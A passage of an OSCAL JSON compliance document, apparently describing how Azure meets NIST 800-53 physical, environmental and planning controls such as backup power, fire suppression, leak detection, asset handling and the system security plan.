Alternate refueling agreements are required in order to ensure a fuel supply is available in the event of a long-term utility power loss.\n\nAzure Third-Party (Leased) Datacenters\n\nAzure requires that its leased datacenter providers be capable of providing sufficient UPS power to allow for the transition of the system's full load to generator power. Azure also requires that onsite power generation be capable of sustaining the system's full load for 48 hours with on-site fuel stores. Azure requires that its leased datacenter providers also have alternate fuel agreements in place to allow for refueling."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"cd499ca0-6859-4d05-889e-6b4238297707","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-11.1","statements":[{"uuid":"8083b72b-cfee-43cd-8701-21dd8a47065d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-035"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-11.1_smt","by-components":[{"uuid":"095ba3f2-83f1-4544-ba46-a6cf4694b4ce","export":{"provided":[{"uuid":"7605ddc1-315e-458d-82ca-5990a7e46a1f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-035"}],"description":"In the event of an extended loss of the primary power source, Azure implements a long-term alternate power supply for the information system that can maintain minimally required operational capability. 
When power fails or drops to an unacceptable voltage level, Uninterruptible Power Supply (UPS) systems instantly kick in and take over the power load. This provides enough power for running the servers until the generators can take over. Emergency generators provide back-up power for extended outages and for planned maintenance and can operate the datacenter with on-site fuel reserves in the event of a natural disaster. Azure maintains diesel generators at many of its datacenters. Backup generators are used when necessary to help maintain grid stability or in extraordinary repair and maintenance situations that require us to take our datacenters off the power grid.\n\nAzure datacenters are designed with at least an n+1 configuration for electrical and cooling systems. Azure datacenters maintain sufficient onsite fuel storage to operate for approximately 48 hours. Alternate refueling agreements are required in order to ensure a fuel supply is available in the event of a long-term utility power loss."}]},"description":"See inheritance 
statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"f66e38a3-0fbc-4155-9c6a-f6fcc15ad87b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-12","statements":[{"uuid":"a045856e-8996-45b5-adcc-e1cb88e7177c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-036"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-12_smt","by-components":[{"uuid":"f11b3be5-35b2-4697-b632-58088044161e","export":{"provided":[{"uuid":"c0e10935-99d1-4117-bebb-3e3331a41dfe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-036"}],"description":"Azure datacenters implement emergency lighting in the form of overhead emergency lighting on dedicated circuits backed up by UPS and generator systems. Automatic emergency lighting is implemented along all evacuation routes, emergency exits, and inside the colocations in accordance with the National Fire Protection Association (NFPA) Life Safety Code. If utility power is lost, the emergency lighting automatically switches to power provided by the UPS and generator systems. 
The emergency lighting systems within Azure datacenters undergo routine maintenance to ensure that they remain in proper working order."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"39c0d2bc-ac30-4ccb-b0d8-542c3727b6b1","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-13","statements":[{"uuid":"e585141b-95c6-4dcf-b67d-afcc374354a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-037"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-13_smt","by-components":[{"uuid":"227b2bde-385a-4b54-98fc-8aa75a8dc6e8","export":{"provided":[{"uuid":"e7ce5183-8e68-478b-961e-95372650c502","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-037"}],"description":"Azure has implemented fire protection by installing fire detection and fire suppression systems at the Azure datacenters. Azure datacenters implement robust fire detection mechanisms. The Azure fire protection approach includes the use of photoelectric smoke detectors installed below the floor and on the ceiling, which are integrated with the fire protection sprinkler system. Additionally, there are Very Early Smoke Detection Apparatus (VESDA) systems in each colocation which monitor the air. VESDA units are highly sensitive air sampling systems installed throughout multiple high-value spaces. VESDA units allow for an investigative response prior to an actual fire detection alarm.\n\nPull station fire alarm boxes are installed throughout the datacenters for manual fire alarm notification. 
Fire extinguishers are located throughout the datacenters and are properly inspected, serviced, and tagged annually. The security staff patrols all building areas multiple times every eight (8) hour shift. The Critical Environments (CE) Team does a daily site walk-through checking on each room and many component parts in each non-monitored room, ensuring all fire watch requirements are being met.\n\nAreas containing sensitive electrical equipment (colocations, Main Distribution Frames (MDFs), etc.) are protected by double interlock pre-action (dry pipe) sprinkler systems. Dry pipe sprinklers are a two-stage pre-action system that requires both a sprinkler head activation (due to heat) as well as smoke detection to release water. The sprinkler head activation releases the air pressure in the pipes which allows the pipes to fill with water. Water is released when a smoke or heat detector is also activated.\n\nFire detection/suppression and emergency lighting systems are wired into the datacenter UPS and generator systems providing for a redundant power source."}]},"description":"See inheritance 
statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"3dc6e061-594b-4214-bb4e-b6e7367df018","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-13.1","statements":[{"uuid":"cbc73ef6-7100-42e8-aff9-fbf2b51230d2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-038"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-13.1_smt","by-components":[{"uuid":"ec241d67-8eb0-49c3-82b0-93ae1eff447c","export":{"provided":[{"uuid":"673b9e29-6bd2-4dc5-98f6-9cf2ec9f78c3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-038"}],"description":"Azure employs fire detection devices/systems for the information system that activate automatically and notify datacenter personnel along with emergency responders in the event of a fire.\n\nFire detection includes photoelectric smoke detectors installed below the floor and on the ceiling and smoke detection systems such as the Xtralis Very Early Smoke Detection Apparatus (VESDA) systems, as well as pull station fire alarms for manual fire alarm notification.\n\nIf one of the fire detection mechanisms is activated in any colocation, the local fire department is automatically notified through a contracted third-party monitoring vendor. 
In addition, the fire protection and fire detection systems are tied into the security system notifying the local facility and security staff."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"8d2343c9-2bee-4684-b641-7edf3f8b7efb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-13.2","statements":[{"uuid":"826076c4-cbd5-4fd4-bb38-3fecf3afe009","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-039"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-13.2_smt.a","by-components":[{"uuid":"714b6de1-bd97-45b1-aa78-9f4aabe5ccf3","export":{"provided":[{"uuid":"8701054e-16ae-4da7-a15e-32d5d73e4f9b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-039"}],"description":"If one of the fire suppression systems is activated at the datacenter, the local fire department is automatically notified through the fire alarm system. In addition, the fire protection and fire detection systems are tied into the security system notifying the local facility and security staff. Azure datacenters are staffed twenty-four (24) hours a day, seven (7) days a week. 
Fire suppression systems engage automatically without manual intervention when a fire alarm situation is detected."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"08a53c93-c376-44e5-b27e-cd1362007bdc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-040"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-13.2_smt.b","by-components":[{"uuid":"e341b4b7-3ee3-42d4-bedb-6b9536d55bda","export":{"provided":[{"uuid":"b609a6ad-41b2-4924-9345-3d87c26c4a2c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-040"}],"description":"If one of the fire suppression systems is activated at the datacenter, the local fire department is automatically notified through the fire alarm system. In addition, the fire protection and fire detection systems are tied into the security system notifying the local facility and security staff. Azure datacenters are staffed twenty-four (24) hours a day, seven (7) days a week. Fire suppression systems engage automatically without manual intervention when a fire alarm situation is detected. 
Automatic fire suppression capability is deployed in addition to staffing."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"6f647c79-0b6e-48b0-aaac-17676cee6c71","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-14","statements":[{"uuid":"d995aff4-37ff-4f74-97a0-341d7cdb6c49","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-041"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-14_smt.a","by-components":[{"uuid":"2a5872b5-da49-4e39-8a6d-1f96c1732d79","export":{"provided":[{"uuid":"5dc3d9bd-9347-461f-b683-b63ebde5a5e4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-041"}],"description":"Azure maintains the temperature and humidity levels in accordance with Microsoft datacenter guidelines. 
The temperature and humidity levels are monitored continuously by the datacenter's Building Management System (BMS)."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"302752b3-a478-459f-8f15-f94c69d5685a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-042"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-14_smt.b","by-components":[{"uuid":"005937b5-18c6-4b1b-9a3d-336dc314a992","export":{"provided":[{"uuid":"2252720d-3ed8-482b-bffc-1472a14c0caf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-042"}],"description":"At Azure datacenters, temperature and humidity levels are monitored continuously by the Building Management System (BMS). CE team members monitor the BMS from the Facilities Operations Center (FOC), so that they can manage the temperature and humidity within the datacenter before any alarm points are exceeded. BMS is configured with several notification points. As the temperature or humidity approaches these points, notifications are sent so that the CE team can be dispatched for investigation or able to make adjustments to remediate the temperature or humidity within the datacenter. The acceptable datacenter temperature range within cold aisles is between 65 degrees and 95 degrees Fahrenheit. In certain instances, the temperature may require adjustment outside of this range to address local geographical and meteorological factors. 
Datacenter humidity is measured by Relative Humidity percentage, Non-Condensing with the current acceptable range between 10% and 80%."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"a026398f-f7d2-4dfa-949f-b63a41238fe7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-14.2","statements":[{"uuid":"c77650a2-bfd4-43e6-9bd0-5fb83a073908","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-043"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-14.2_smt","by-components":[{"uuid":"60b817bc-611e-4e2d-a40b-3aab104ef840","export":{"provided":[{"uuid":"e4e00086-933c-43c1-b30b-3ff60aec8cc4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-043"}],"description":"At Azure datacenters, temperature and humidity levels are monitored continuously by the Building Management System (BMS). CE team members monitor the BMS from the Facilities Operations Center (FOC), so that they can manage the temperature and humidity within the datacenter before any alarm points are exceeded. BMS is configured with several notification points. 
As the temperature or humidity approaches these points, notifications are sent so that the CE team can be dispatched for investigation or to adjust the temperature or humidity within the datacenter."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"569d62fe-fb6f-43b2-a7ec-e99247d6d401","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-15","statements":[{"uuid":"8100ce22-e986-4f4d-b849-a668fc9ca236","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-044"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-15_smt","by-components":[{"uuid":"7a221166-d0fb-45d5-8088-355e8756b43c","export":{"provided":[{"uuid":"f9089324-25b1-40f9-9a05-1fcc86dcdcc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-044"}],"description":"Azure provides water and leak detection in areas with a risk of water leakage, such as near Air Handler Units. Fire suppression systems also have leak detection alarms that are monitored. The water/leak detection system is integrated with the facility alarm and notification system. The sprinkler systems in the datacenters are zoned. The Critical Environment (CE) team and Datacenter Management (DCM) teams are familiar with emergency procedures requiring the use of the water shutoff valves and their locations. The sprinkler risers can be shut off individually or as a group via gate valves. All sprinklers in the critical space are double interlock pre-action type sprinklers that require two forms of activation before flow is initiated. 
The pressure of the sprinkler system is monitored and alarmed against water leakage."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"9ad4f21b-3b40-4d98-ad21-a778382f7f09","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-15.1","statements":[{"uuid":"dc7e1acd-3072-4ea1-a85f-5023ea038a5c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-045"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-15.1_smt","by-components":[{"uuid":"2f061a5c-81e2-4084-87d5-9f988db967eb","export":{"provided":[{"uuid":"048d48b3-9031-436c-a94f-ffd301b6ece8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-045"}],"description":"Azure employs automated mechanisms to detect water presence in the datacenters and alert datacenter personnel. Azure provides water/leak detection in areas with a risk of water leakage (e.g. Air Handler Units). Fire suppression systems also have leak detection alarms that are monitored. The water/leak detection system is integrated with the facility alarm and notification system. 
The pressure of the sprinkler system is monitored and alarmed against water leakage."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"b1f92102-0f98-4e3a-848c-53f6e637a8b8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-16","statements":[{"uuid":"dd17842f-fd44-4d61-a353-e36e105e68a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-046"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-16_smt","by-components":[{"uuid":"8407b815-9200-4150-ae9b-cdf255d3687a","export":{"provided":[{"uuid":"1ec93024-ced9-439b-8926-f44a3bfe4dfb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-046"}],"description":"Assets that are to be destroyed are stored in locked storage bins that are under CCTV camera coverage. When the assets are ready to be destroyed, the locked storage bins are moved to shredding locations by a Microsoft full-time employee (FTE) from Asset Management. As shredding occurs at the datacenter and under Microsoft supervision, Azure assets do not leave the controlled areas of the datacenter. Azure implements strict enforcement of what is allowed to enter and exit the datacenter. All system components/assets are tracked in the asset management tool database. Information system component deliveries must be scheduled; unscheduled deliveries are refused entry past the datacenter gates. Deliveries are received in the facilities loading bay. The facilities asset manager must be present during the delivery. 
The loading bay is monitored with a live CCTV feed in the datacenter security operations center. In datacenters where the loading bay is adjacent to the staging area, the loading bay doors are designed in an interlock configuration, so that if the loading bay door is open for a delivery truck, the interior door to the staging area is not capable of being opened. When an information system component enters the building, the asset management team verifies the received item against the referenced ticket and then scans the device into the Azure-managed asset management tool. New assets are unpacked in the staging area and stored in the asset management room until deployment. Depending on asset value, some high-value assets are stored in separate locked cages with cameras. The general storage area within the asset management room requires an access smart card for entry and has multiple cameras for video monitoring. For an information system component that is leaving the datacenter, a ticket request must be generated on the system owner's behalf via the asset deployment tool. All data is removed from the system (i.e. hard drives wiped or purged depending on asset classification) before leaving the datacenter. All information system components received or shipped are tracked by the workflow ticketing tool and/or in the receiving/shipping logs in the asset management tool. Visitors are prohibited from using personal laptops or cell phones with camera capabilities in the production environment (colocations) per the datacenter policy and work rules. If the equipment entering the datacenter is used for maintenance purposes, the equipment requires datacenter management approval in the DCAT system.\n\nAzure Third Party (Leased) Datacenters\n\nIn leased datacenters, the loading bay area is controlled by the datacenter provider. 
To manage entry and exit of Azure system components, an Azure representative must be present during the process."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"c258c72f-dc15-4a16-b734-5bf499436f97","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-17","statements":[{"uuid":"62211750-a5b6-4d81-bc52-5e36ca39bd1e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-047"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-17_smt.a","by-components":[{"uuid":"e2c3b492-afd0-4ada-ae1b-20d6204588b1","export":{"provided":[{"uuid":"0ebc686a-a582-4f7a-bbb5-f4acf0837128","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-047"}],"description":"Azure identifies designated Microsoft campuses and telecommuting locations as the alternate worksites. Azure has implemented appropriate management, operational, and technical controls at these facilities, i.e., all Azure datacenters in the US have the same controls implemented as documented in this SSP. These controls are assessed to assure the effectiveness of the security measures. Access controls at the alternate work sites are monitored regularly, and visitors are required to check in with the receptionist. Telecommuting locations are governed by the Microsoft remote access policy, which requires remote access to production Microsoft online services' networks to employ authentication mechanisms. Microsoft owns multiple buildings from which Microsoft personnel can work in the case of an emergency in a building or set of buildings. 
Microsoft buildings are built and operated to the same security standards."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"ee4f2003-1160-4abe-837a-b143954a0e48","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-048"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-17_smt.b","by-components":[{"uuid":"7bb7db8b-1fbf-4c6e-9af3-80f1112bb70d","export":{"provided":[{"uuid":"a5662251-79fb-40bf-96f1-effed1f3a9a3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-048"}],"description":"Azure testing procedures based on NIST Special Publication 800-53A Revision 5 are assessed at each datacenter, regardless of whether they are designated as primary or alternate sites for applications supported in the environment. Azure implements the same controls at each of these work sites, as each site supports various Microsoft properties. Depending on capacity, each datacenter can be used as an alternate to another and is built to identical physical, environmental, and security standards. The security controls at each datacenter are identical and in accordance with the procedures outlined in the Physical Security Operations Standard Operating Procedure (SOP). 
All datacenter work is performed by Microsoft personnel who are cleared, trained, and authorized to work within the datacenter environment."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]},{"uuid":"71ca3a93-ba4d-4cab-bedc-30505d1ca022","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-049"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-17_smt.c","by-components":[{"uuid":"61f4ed95-544b-4c0c-b182-99f9c33d2792","export":{"provided":[{"uuid":"df53773f-b8bf-4683-a3b3-59eab6436b23","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-049"}],"description":"In the event of a security incident, datacenter personnel can communicate with each other using handheld radios and cell phones. During an incident one practice is to create a conference bridge to allow for communication with alternate worksites and the Security Response Team. In addition, Azure personnel are trained on incident management capabilities. 
This training is conducted at least annually."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"f33803b3-8046-4bb4-b451-ef834dd95cdc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-18","statements":[{"uuid":"e6519dde-564e-46b8-a231-eee41a814252","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-050"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"}],"statement-id":"pe-18_smt","by-components":[{"uuid":"42b208cb-b5a5-45a3-9762-ba248253e01e","export":{"provided":[{"uuid":"b07daa0d-5b02-4ea2-9f6f-900c640d211b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-050"}],"description":"Azure implements a strategic datacenter design approach to satisfy the location of information system components control. All Microsoft's online services' equipment is placed in locations which have been engineered to be protected from environmental risks such as theft, fire, explosives, smoke, water, dust, vibration, earthquake, harmful chemicals, electrical interference, power outages, electrical disturbances (spikes), and radiation. The facility and infrastructure have implemented seismic bracing for protection against environmental hazards. All colocation and Main Distribution Frame (MDF) rooms are protected by access control, alarms, and video. The facility is also patrolled by security officers twenty-four (24) hours a day, seven (7) days a week. 
All portable Azure assets are locked or fastened in place to provide protection against theft or movement damage."}]},"description":"See inheritance statement.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]}]}]}]},{"uuid":"2f708e9e-37fc-4476-b033-443c927c596c","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-2","statements":[{"uuid":"b271b30c-2b0e-4ac8-b1a2-620964e80abb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.a","by-components":[{"uuid":"ca64a09e-dbf5-4e63-a955-2e4a26865e29","export":{"provided":[{"uuid":"8b1624a5-4db4-4c54-acfc-84c752dfaec0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-006"}],"description":"The Azure System Security Plan provides an overview of the security requirements for Azure and the services within. Additionally, it contains a description of the security controls that are in place to meet those requirements. The Azure System Security Plan is created in accordance with NIST Special Publication 800-18 Revision 1, Guide for Developing Security Plans for Federal Information Systems based on the required template, which contains guidance on security planning. This includes accurately defining the Azure accreditation boundary, as well as describing the operational environment, the security controls that are applicable to the system, and the system interconnections. The Azure System Security Plan documents the security categorization of the system based on the typical information being stored, processed or transmitted in Azure. 
The sponsor's Authorizing Official (AO) approves the System Security Plan as part of the package submission and granting of the Authority to Operate (ATO). This SSP: * Explicitly defines the boundary of the system in sections 9 and 10 of this document. * Provides an overview of the security and operational requirements for the system and a description of the security controls in place or planned for meeting those requirements in the Minimum Security Controls in section 13 of this document. * Provides the overview of the infrastructure for storage that provides customers the capability to purchase, use, and/or deploy these offerings within Azure in sections 9 and 10. Customers configure their implementation of Storage using the Azure portal. * Provides a security categorization of the system in section 2 based on the information being stored, processed, and transmitted. The system security categorization determination is based on the actual data stored, processed or transmitted by customers utilizing Azure services. * Is aligned with the guidance contained in NIST Special Publication 800-18 Revision 1, which contains guidance on security planning. This includes accurately defining Azure, as well as describing the operational environment and all security controls that are applicable to the system. * Describes relationships with or connections to other information systems. * Is reviewed and approved by the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators prior to plan implementation. The Microsoft Security Policy (MSP) and associated standards establish coordination requirements among organizations in order to determine if security and privacy related activities are going to affect Azure. Azure personnel plan and coordinate security and privacy related activities to ensure they do not adversely affect operations. Key operating personnel from each service team assist with change control board and policy reviews that relate to security activities. 
Individuals assigned to these roles understand the significance of the ongoing security and privacy related activities (security assessments, audits, system hardware and software maintenance, vulnerability scanning and patching, security certifications, and testing exercises), the potential impact on the system, and the necessary support for such activities. If activities involve Azure fundamental services, those teams are included in planning as well. Azure has a formal technology strategy that is maintained and updated annually to align the strategy with business goals and objectives. Azure plans and coordinates security and privacy related activities such as application and infrastructure upgrades, security audits and testing, and continuity planning exercises affecting the information system with C+AI Security management before conducting such activities in order to reduce the impact on organizational operations, organizational assets, individuals, and Azure customers."}],"responsibilities":[{"uuid":"f5bc6c4f-3df2-48eb-9fa1-b0c49bc12f96","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-006"}],"description":"The customer is responsible for developing a system security plan (SSP) that meets the criteria defined by the target authorization. Customers may reference NIST Special Publication 800-18 Revision 1, Guide for Developing Security Plans for Federal Information Systems. 
The customer SSP should address controls inherited from Azure and refer to the Azure SSP for implementation details.","provided-uuid":"8b1624a5-4db4-4c54-acfc-84c752dfaec0"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7b79c7a7-ef74-49c8-9a80-5df1f18c4fcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"pl-2_smt.b","by-components":[{"uuid":"9a1b98e6-5fbf-4ec6-96ec-6f98dd96eec7","export":{"provided":[{"uuid":"62792c63-877f-4448-a513-79d8071b522d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-007"}],"description":"The Azure System Security Plan is posted on the internal Azure SharePoint and distributed to the Azure ISSO and Azure Program Managers."}],"responsibilities":[{"uuid":"d172292f-0828-44e8-8101-d4c566ef1a68","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-007"}],"description":"The customer is responsible for distributing the system security plan.","provided-uuid":"62792c63-877f-4448-a513-79d8071b522d"}]},"description":"See inheritance and customer responsibility 
